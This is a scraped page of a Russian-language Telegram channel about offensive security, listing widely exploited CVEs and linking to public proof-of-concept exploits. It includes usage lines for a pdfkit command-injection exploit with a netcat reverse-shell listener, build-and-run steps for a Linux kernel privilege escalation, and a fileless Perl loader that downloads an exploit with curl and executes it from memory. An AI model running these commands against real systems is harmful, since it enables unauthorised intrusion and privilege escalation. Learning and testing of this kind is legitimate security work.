Путь до хакера | Cyber security
1.02K subscribers
71 photos
2 videos
17 files
139 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
Топ 15 более используемых уязвимостей в 2к22:
1. Log4Shell (CVE-2021-44228)
2. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
3. ProxyShell (CVE-2021-31207
4. CVE-2021-34473
5. CVE-2021-34523)
6–9. ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
10. Server/Data Center Atlassian Confluence (CVE-2021-26084)
11. Уязвимость VMware vSphere (CVE-2021-21972)
12. ZeroLogon (CVE-2020-1472)
13. Сервер Microsoft Exchange (CVE-2020-0688)
14. Pulse Secure Pulse Connect Secure (CVE-2019-11510)
15. Fortinet FortiOS и FortiProxy (CVE-2018-13379)
Подробнее: тык
#новости #CVE
На досуге можно заняться полезным делом и, например, потрениться/поучиться навыкам взлома благодаря Metasploitable

Но для него нужен Virtual Box:
apt-get install virtualbox-dkms
virtualbox
*На винде он тоже есть*

Теперь давайте установим сам Metasploitable:
https://sourceforge.net/projects/metasploitable/

Далее закидываем соответствующий файл в VB и наслаждаемся)

P.S. если нужна будет помощь в установке- милости прошу в комментарии
#полезные_материалы #CVE #новости
PoC для уязвимости CVE-2022-40684 (Fortinet RCE)

Данная уязвимость затрагивает брандмауэры FortiGate, веб-прокси FortiProxy, а также FortiSwitch Manager и оценивается в 9,6 балла из 10 возможных по шкале CVSS. Позволяет осуществить полный обход аутентификации.

Подробнее: тык
#CVE
MacDirtyCowDem

Получаем root в macOS 13.0.1 через CVE-2022-46689

Подробнее: https://github.com/zhuowei/MacDirtyCowDemo
#CVE
Теперь на канале настроена удобная навигация по категориям постов, которые будут находиться в этом закрепленном сообщении и описании канала🔥
#райтап
#hack_the_box
#новости
#CVE
#полезные_материалы
#литература
#софт
#termux
CVE-2023-21752 aka уязвимость удаления произвольного файла в службе резервного копирования Windows

Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system

Этот репозиторий содержит два эксплойта:

1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами

Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
Общедоступная коллекция CVE и эксплойтов в студию🔥
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению

Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
PDFkit-CMD-Injection (CVE-2022-25765)

Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6

Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337


Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)

Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc

PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.

PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit


Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;

my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'


Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE

➡️ Github PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM